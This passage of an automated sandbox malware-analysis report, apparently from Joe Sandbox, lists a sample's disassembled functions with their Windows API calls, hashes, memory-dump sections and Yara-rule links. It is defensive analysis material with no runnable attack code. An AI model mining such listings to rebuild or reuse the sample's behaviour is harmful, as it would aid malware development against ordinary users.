                                                    • Opcode Fuzzy Hash: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
                                                    • Instruction Fuzzy Hash: EB11C2317057408BD3318F2CEA60B0AB7F2ABA1711FA40A6FE091CB784C761D842C790
                                                    Function 00408BB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00408BBF
                                                      • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                      • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                    • memmove.MSVCRT(?,?,?,?,?,004089E2,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408BF5
                                                    Strings
                                                    • invalid string position, xrefs: 00408BBA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
                                                    • String ID: invalid string position
                                                    • API String ID: 655285616-1799206989
                                                    • Opcode ID: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
                                                    • Instruction ID: 1be7ab364882a8fa79e272fabefde4f39cec4c957e742b5a331aa6ba38d6d88d
                                                    • Opcode Fuzzy Hash: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
                                                    • Instruction Fuzzy Hash: D701D4703047014BD7258A2CEE9062AB3F6DBD1704B24093EE1D2DB785DBB8EC828398
                                                    Function 02484D47 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50stringnetworkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlen.KERNEL32(?,00000000,?), ref: 02484DA6
                                                    • InternetCrackUrlA.WININET(?,00000000), ref: 02484DAE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CrackInternetlstrlen
                                                    • String ID: <
                                                    • API String ID: 1274457161-4251816714
                                                    • Opcode ID: c02e02a012b36fed2c74b04be6013df41c29549af876b812a53909887fa019d5
                                                    • Instruction ID: ce3a05229dc7410b44c2ef344fdf29a6597125834edd2db07cc00820841023eb
                                                    • Opcode Fuzzy Hash: c02e02a012b36fed2c74b04be6013df41c29549af876b812a53909887fa019d5
                                                    • Instruction Fuzzy Hash: 56011B71D00218AFDB10DFA9EC44B9EBBA9AB08360F00412AF954E7390EB7459058FD0
                                                    Function 0249C3BF Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 024A4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024A42B4
                                                      • Part of subcall function 024A4287: lstrcpy.KERNEL32(00000000,?), ref: 024A42E9
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5B2
                                                    • lstrcat.KERNEL32(00000000), ref: 0249C5BC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5EA
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                    • String ID:
                                                    • API String ID: 2910713533-0
                                                    • Opcode ID: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
                                                    • Instruction ID: dbc138cc8ef176b12084dbf7f3458f14646e16706f78f70f6c746e668b08dc98
                                                    • Opcode Fuzzy Hash: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
                                                    • Instruction Fuzzy Hash: F6315C71D102A5ABCF21EFA5CC84B9EBBB6AF48308F14446BD405AB251DB74DE82DF50
                                                    Function 0249C479 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 024A4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024A42B4
                                                      • Part of subcall function 024A4287: lstrcpy.KERNEL32(00000000,?), ref: 024A42E9
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5B2
                                                    • lstrcat.KERNEL32(00000000), ref: 0249C5BC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5EA
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                    • String ID:
                                                    • API String ID: 2910713533-0
                                                    • Opcode ID: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
                                                    • Instruction ID: 45304ce757bfe812b3c6fbdd4643d22b08f8bc11cb6ffd5149eee6a25d2fe10c
                                                    • Opcode Fuzzy Hash: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
                                                    • Instruction Fuzzy Hash: CB314E71D102A5ABCF21EFB5CC84A9EBBB2AF48308F14446BD805AB651EB74DD42DF50
                                                    Function 0249C41C Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 024A4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024A42B4
                                                      • Part of subcall function 024A4287: lstrcpy.KERNEL32(00000000,?), ref: 024A42E9
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5B2
                                                    • lstrcat.KERNEL32(00000000), ref: 0249C5BC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5EA
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                    • String ID:
                                                    • API String ID: 2910713533-0
                                                    • Opcode ID: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
                                                    • Instruction ID: 4f735c7f73f8653c41886299a0ed15c85a4b61f063b5d006074d5a608305177c
                                                    • Opcode Fuzzy Hash: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
                                                    • Instruction Fuzzy Hash: 4C315E71E102A4ABCF21EFA5CC84B9EBBB2AF49308F14446BD405A7251DB74DD42DF50
                                                    Function 0249C4D0 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 024A4287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024A42B4
                                                      • Part of subcall function 024A4287: lstrcpy.KERNEL32(00000000,?), ref: 024A42E9
                                                      • Part of subcall function 024A7557: lstrcpy.KERNEL32(00000000), ref: 024A7586
                                                      • Part of subcall function 024A7557: lstrcat.KERNEL32(00000000), ref: 024A7592
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5B2
                                                    • lstrcat.KERNEL32(00000000), ref: 0249C5BC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5EA
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                    • String ID:
                                                    • API String ID: 2910713533-0
                                                    • Opcode ID: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
                                                    • Instruction ID: de5c973724f1b1f9865c1f17bb32b48d5339ffdd427f5e1e8b333af0facf990a
                                                    • Opcode Fuzzy Hash: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
                                                    • Instruction Fuzzy Hash: A0314971E102A4ABCF21EFB5CC84B9EBBB2AF48308F14446BD405AB651DB74DA42DF50
                                                    Function 00421550 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 00421581
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 004215B9
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 004215F1
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00421629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
                                                    • Instruction ID: 80d308abde563585a592328bb7eba962bc113a2ea9b505a2ad5a72594fb3347d
                                                    • Opcode Fuzzy Hash: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
                                                    • Instruction Fuzzy Hash: EE211EB4701B029BD724DF3AD958A17B7F5BF54700B444A2EA486D7BA0DB78F840CBA4
                                                    Function 00401410 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000), ref: 0040152D
                                                      • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 0040154F
                                                      • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401571
                                                      • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401593
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401437
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401459
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040147B
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 004014DF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
                                                    • Instruction ID: 368a80f0553ecf631160e054036b62fbe6d7ddfceb8bd69434bdfc69ba453b92
                                                    • Opcode Fuzzy Hash: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
                                                    • Instruction Fuzzy Hash: 4A31A575A01B029FC728DF3AD588957BBE5BF48704700492EA956D3BA0DB74F811CB94
                                                    Function 02481673 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000), ref: 02481794
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817B6
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817D8
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817FA
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248169E
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024816C0
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024816E2
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481746
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
                                                    • Instruction ID: bf7a309240cc7a19446bab8b523a3f1b8bc64b2b2f78fd06ae282474dc94546d
                                                    • Opcode Fuzzy Hash: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
                                                    • Instruction Fuzzy Hash: A8311474A21B42AFD724EF3AC98891BB7E5BF48704704092E989AD3B10DB70F411CF90
                                                    Function 02481677 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000), ref: 02481794
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817B6
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817D8
                                                      • Part of subcall function 02481777: lstrcpy.KERNEL32(00000000,?), ref: 024817FA
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248169E
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024816C0
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024816E2
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481746
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
                                                    • Instruction ID: a521fb17a83e75129b6b6d48242b4093ab9e67d98ccb41159915721e83b40492
                                                    • Opcode Fuzzy Hash: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
                                                    • Instruction Fuzzy Hash: 0A311474A21B42AFD724EF3AC98895BBBE5BF48704704092E989AC3B10DB70F411CF90
                                                    Function 024A17B7 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 024A17E8
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024A1820
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024A1858
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024A1890
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
                                                    • Instruction ID: 6a685155aead467289340dcee735287366ffc293aaab0bb63e249f5b8abee4dd
                                                    • Opcode Fuzzy Hash: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
                                                    • Instruction Fuzzy Hash: B621F9B4601B429BD734EF3AC9A8A1BB7E5AF54304B14491ED89EC7B40EB74E441CFA0
                                                    Function 0249C39D Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 024A75A7: lstrlen.KERNEL32(------,02485D82), ref: 024A75B2
                                                      • Part of subcall function 024A75A7: lstrcpy.KERNEL32(00000000), ref: 024A75D6
                                                      • Part of subcall function 024A75A7: lstrcat.KERNEL32(?,------), ref: 024A75E0
                                                      • Part of subcall function 024A7517: lstrcpy.KERNEL32(00000000), ref: 024A7545
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5B2
                                                    • lstrcat.KERNEL32(00000000), ref: 0249C5BC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C5EA
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C629
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$SystemTimelstrlen
                                                    • String ID:
                                                    • API String ID: 3486790982-0
                                                    • Opcode ID: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
                                                    • Instruction ID: 29f406a5058da54c0241f54da465f9602c2a3fa14bef30afebaa624f018bb2cb
                                                    • Opcode Fuzzy Hash: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
                                                    • Instruction Fuzzy Hash: 9D216D71D10295ABCF21EFB5CCC8AAEBBB6AF48309F14446BD401AB251EB74D941DF90
                                                    Function 00406E32 Relevance: 5.1, APIs: 4, Instructions: 69memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memcpy.MSVCRT(?,?,00000040), ref: 00406E40
                                                    • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00406EBB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heapmemcpy$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1643994569-0
                                                    • Opcode ID: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
                                                    • Instruction ID: 021ca828da5bfa0a796bb6e6c33eee2a11837a2b1fb4363adf8c912b1a52eb88
                                                    • Opcode Fuzzy Hash: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
